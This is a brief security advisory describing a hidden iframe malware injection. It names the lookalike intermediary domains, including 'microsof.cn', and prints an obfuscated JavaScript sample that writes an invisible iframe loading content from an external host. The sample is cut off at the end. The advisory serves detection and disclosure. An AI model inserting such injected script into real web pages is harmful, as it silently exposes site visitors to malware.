Description:
We detected an iframe injection using javascript to hide is presence. It is a common form of malware injection and we are seeing multiple domains being used as intermediaries, including:
microsof.cn
trughtsa.com
updatedate.cn
And a few other domains. This is used to load malware from external web sites while not being visible to the user.
Affecting: Any web site (no specific CMS targeted).
Malware dump (sample of malware):
<script>document.write ("<"+ 'if'+' '+'ra'+''+"me"+' sr'+"c="ht"+'t'+"p:"+''+"/"+''+'/mic'+"roso"+"tf"+''+'.c'+''+"n"+'/'+"" wid"+' '+"th=1 h"+"eigh"+''+'t'+"="+"2>/i"+''+"fr"+"a"+''+""+''+"me"+'>');</script><s...